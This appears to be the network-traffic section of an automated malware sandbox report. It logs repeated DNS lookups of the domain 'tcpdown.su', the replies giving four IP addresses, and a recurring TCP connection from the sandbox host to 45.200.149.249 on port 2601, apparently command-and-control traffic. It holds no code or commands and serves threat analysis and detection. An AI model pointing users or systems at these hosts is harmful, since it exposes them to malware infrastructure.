                                                                                                              Jan 7, 2025 01:10:10.823257923 CET26014017245.200.149.249192.168.2.13
                                                                                                              Jan 7, 2025 01:10:11.129362106 CET26014017245.200.149.249192.168.2.13
                                                                                                              Jan 7, 2025 01:10:11.129427910 CET401722601192.168.2.1345.200.149.249
                                                                                                              Jan 7, 2025 01:11:11.178282022 CET401722601192.168.2.1345.200.149.249
                                                                                                              Jan 7, 2025 01:11:11.183078051 CET26014017245.200.149.249192.168.2.13
                                                                                                              Jan 7, 2025 01:11:11.475688934 CET26014017245.200.149.249192.168.2.13
                                                                                                              Jan 7, 2025 01:11:11.475750923 CET401722601192.168.2.1345.200.149.249
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 7, 2025 01:09:36.300565004 CET4696753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET53469671.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:36.312282085 CET3833653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:36.326466084 CET53383361.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:36.330194950 CET4360753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:36.338979006 CET53436071.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:36.342773914 CET5325553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:36.351916075 CET53532551.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:36.355298996 CET3923253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:36.364597082 CET53392321.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:36.368201971 CET3374453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:36.381639004 CET53337441.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:38.288156033 CET3562253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET53356221.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:38.355067968 CET4937653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:38.491684914 CET53493761.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:38.522713900 CET4882253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:38.529294014 CET53488221.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:38.547946930 CET5022353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:38.562469006 CET53502231.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:38.572882891 CET3302253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:38.581551075 CET53330221.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:38.587898970 CET5766253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:38.596405029 CET53576621.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:40.468266010 CET4498853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET53449881.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:40.477267981 CET4190753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:40.485817909 CET53419071.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:40.487668991 CET4548353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:40.494653940 CET53454831.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:40.496727943 CET3687253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:40.508982897 CET53368721.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:40.510910034 CET5858153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:40.529908895 CET53585811.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:40.531765938 CET3318053192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:40.539072037 CET53331801.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:42.380412102 CET4459053192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET53445901.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:42.393699884 CET4677453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:42.402287960 CET53467741.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:42.404100895 CET3860553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:42.411350965 CET53386051.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:42.413222075 CET3928353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:42.420355082 CET53392831.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:42.422086954 CET4402653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:42.436883926 CET53440261.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:42.438721895 CET3727153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:42.453128099 CET53372711.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:44.302591085 CET5513853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET53551381.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:44.310592890 CET4967853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:44.323880911 CET53496781.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:44.325252056 CET4545953192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:44.332304955 CET53454591.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:44.333389044 CET5075353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:44.350178003 CET53507531.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:44.351125956 CET4508253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:44.369431019 CET53450821.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:44.370354891 CET5401353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:44.388986111 CET53540131.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:46.244573116 CET4366753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET53436671.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:46.252288103 CET4209553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:46.260752916 CET53420951.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:46.261457920 CET5870553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:46.268454075 CET53587051.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:46.269134998 CET5789553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:46.276242971 CET53578951.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:46.276952028 CET5197153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:46.283740997 CET53519711.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:46.284408092 CET5674153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:46.291398048 CET53567411.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:48.181046009 CET3621353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET53362131.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:48.192214012 CET4602453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:48.202320099 CET53460241.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:48.203195095 CET3609153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:48.220556974 CET53360911.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:48.221322060 CET5714453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:48.228368044 CET53571441.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:48.229115009 CET3514853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:48.236027956 CET53351481.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:48.236733913 CET5109853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:48.243966103 CET53510981.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:49.805620909 CET4640253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET53464021.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:49.813316107 CET4953153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:49.820650101 CET53495311.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:49.821207047 CET3501853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:49.828130960 CET53350181.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:49.828659058 CET3878153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:49.835601091 CET53387811.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:49.836086035 CET4055753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:49.843921900 CET53405571.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:49.844455957 CET4018753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:49.859469891 CET53401871.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:51.743781090 CET5126553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET53512651.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:51.751450062 CET4286753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:51.758481026 CET53428671.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:51.758986950 CET5794853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:51.777852058 CET53579481.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:51.778388977 CET5310653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:51.792006016 CET53531061.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:51.792524099 CET3885153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:51.800055027 CET53388511.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:51.800553083 CET4583353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:51.808662891 CET53458331.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:53.346074104 CET4805953192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET53480591.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:53.354371071 CET4331253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:53.361603975 CET53433121.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:53.362312078 CET4060653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:53.369473934 CET53406061.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:53.370143890 CET4674453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:53.388869047 CET53467441.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:53.389559984 CET3843253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:53.396502018 CET53384321.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:53.397151947 CET3716253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:53.404627085 CET53371621.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:55.094849110 CET5299153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET53529911.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:55.104981899 CET4654553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:55.114089012 CET53465451.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:55.114748955 CET6027853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:55.135445118 CET53602781.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:55.136492968 CET3836853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:55.145930052 CET53383681.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:55.146812916 CET3858553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:55.156394958 CET53385851.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:55.157094955 CET4727353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:55.166430950 CET53472731.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:56.802767992 CET5608953192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET53560891.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:56.810626030 CET4438853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:56.817677021 CET53443881.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:56.818334103 CET4739853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:56.825311899 CET53473981.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:56.825978994 CET3686953192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:56.833046913 CET53368691.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:56.833672047 CET5523453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:56.840703964 CET53552341.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:56.841391087 CET4518353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:56.848447084 CET53451831.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:58.523789883 CET4041053192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET53404101.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:58.533725977 CET4156453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:58.541791916 CET53415641.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:58.542604923 CET6008153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:58.552382946 CET53600811.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:58.553075075 CET4541853192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:58.561439991 CET53454181.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:58.562124968 CET4695153192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:58.570235014 CET53469511.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:09:58.570924997 CET5872553192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:09:58.591775894 CET53587251.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:10:00.569933891 CET3379753192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET53337971.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:10:00.577877045 CET3329653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:10:00.624587059 CET53332961.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:10:00.625241995 CET4999353192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:10:00.719167948 CET53499931.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:10:00.719957113 CET4379653192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:10:00.759258986 CET53437961.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:10:00.760140896 CET5360453192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:10:00.767234087 CET53536041.1.1.1192.168.2.13
                                                                                                              Jan 7, 2025 01:10:00.768326044 CET5056253192.168.2.131.1.1.1
                                                                                                              Jan 7, 2025 01:10:00.786473036 CET53505621.1.1.1192.168.2.13
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 7, 2025 01:09:36.300565004 CET192.168.2.131.1.1.10x9b5fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.312282085 CET192.168.2.131.1.1.10x99cdStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.330194950 CET192.168.2.131.1.1.10x99cdStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.342773914 CET192.168.2.131.1.1.10x99cdStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.355298996 CET192.168.2.131.1.1.10x99cdStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.368201971 CET192.168.2.131.1.1.10x99cdStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.288156033 CET192.168.2.131.1.1.10xa171Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.355067968 CET192.168.2.131.1.1.10x9fb2Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.522713900 CET192.168.2.131.1.1.10x9fb2Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.547946930 CET192.168.2.131.1.1.10x9fb2Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.572882891 CET192.168.2.131.1.1.10x9fb2Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.587898970 CET192.168.2.131.1.1.10x9fb2Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.468266010 CET192.168.2.131.1.1.10x7b76Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.477267981 CET192.168.2.131.1.1.10xfdbStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.487668991 CET192.168.2.131.1.1.10xfdbStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.496727943 CET192.168.2.131.1.1.10xfdbStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.510910034 CET192.168.2.131.1.1.10xfdbStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.531765938 CET192.168.2.131.1.1.10xfdbStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.380412102 CET192.168.2.131.1.1.10xf191Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.393699884 CET192.168.2.131.1.1.10x58e1Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.404100895 CET192.168.2.131.1.1.10x58e1Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.413222075 CET192.168.2.131.1.1.10x58e1Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.422086954 CET192.168.2.131.1.1.10x58e1Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.438721895 CET192.168.2.131.1.1.10x58e1Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.302591085 CET192.168.2.131.1.1.10x2fe8Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.310592890 CET192.168.2.131.1.1.10x3aa0Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.325252056 CET192.168.2.131.1.1.10x3aa0Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.333389044 CET192.168.2.131.1.1.10x3aa0Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.351125956 CET192.168.2.131.1.1.10x3aa0Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.370354891 CET192.168.2.131.1.1.10x3aa0Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.244573116 CET192.168.2.131.1.1.10x42f5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.252288103 CET192.168.2.131.1.1.10x93d7Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.261457920 CET192.168.2.131.1.1.10x93d7Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.269134998 CET192.168.2.131.1.1.10x93d7Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.276952028 CET192.168.2.131.1.1.10x93d7Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.284408092 CET192.168.2.131.1.1.10x93d7Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.181046009 CET192.168.2.131.1.1.10x27b0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.192214012 CET192.168.2.131.1.1.10x8e4Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.203195095 CET192.168.2.131.1.1.10x8e4Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.221322060 CET192.168.2.131.1.1.10x8e4Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.229115009 CET192.168.2.131.1.1.10x8e4Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.236733913 CET192.168.2.131.1.1.10x8e4Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.805620909 CET192.168.2.131.1.1.10xca71Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.813316107 CET192.168.2.131.1.1.10x2d37Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.821207047 CET192.168.2.131.1.1.10x2d37Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.828659058 CET192.168.2.131.1.1.10x2d37Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.836086035 CET192.168.2.131.1.1.10x2d37Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.844455957 CET192.168.2.131.1.1.10x2d37Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.743781090 CET192.168.2.131.1.1.10x6269Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.751450062 CET192.168.2.131.1.1.10x5b77Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.758986950 CET192.168.2.131.1.1.10x5b77Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.778388977 CET192.168.2.131.1.1.10x5b77Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.792524099 CET192.168.2.131.1.1.10x5b77Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.800553083 CET192.168.2.131.1.1.10x5b77Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.346074104 CET192.168.2.131.1.1.10x9e6eStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.354371071 CET192.168.2.131.1.1.10x3faeStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.362312078 CET192.168.2.131.1.1.10x3faeStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.370143890 CET192.168.2.131.1.1.10x3faeStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.389559984 CET192.168.2.131.1.1.10x3faeStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.397151947 CET192.168.2.131.1.1.10x3faeStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.094849110 CET192.168.2.131.1.1.10xbaf4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104981899 CET192.168.2.131.1.1.10xc370Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.114748955 CET192.168.2.131.1.1.10xc370Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.136492968 CET192.168.2.131.1.1.10xc370Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.146812916 CET192.168.2.131.1.1.10xc370Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.157094955 CET192.168.2.131.1.1.10xc370Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.802767992 CET192.168.2.131.1.1.10xfb1dStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.810626030 CET192.168.2.131.1.1.10x83b6Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.818334103 CET192.168.2.131.1.1.10x83b6Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.825978994 CET192.168.2.131.1.1.10x83b6Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.833672047 CET192.168.2.131.1.1.10x83b6Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.841391087 CET192.168.2.131.1.1.10x83b6Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.523789883 CET192.168.2.131.1.1.10x89edStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533725977 CET192.168.2.131.1.1.10x4c3fStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.542604923 CET192.168.2.131.1.1.10x4c3fStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.553075075 CET192.168.2.131.1.1.10x4c3fStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.562124968 CET192.168.2.131.1.1.10x4c3fStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.570924997 CET192.168.2.131.1.1.10x4c3fStandard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.569933891 CET192.168.2.131.1.1.10xfe02Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577877045 CET192.168.2.131.1.1.10x8b04Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.625241995 CET192.168.2.131.1.1.10x8b04Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.719957113 CET192.168.2.131.1.1.10x8b04Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.760140896 CET192.168.2.131.1.1.10x8b04Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.768326044 CET192.168.2.131.1.1.10x8b04Standard query (0)tcpdown.suFA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
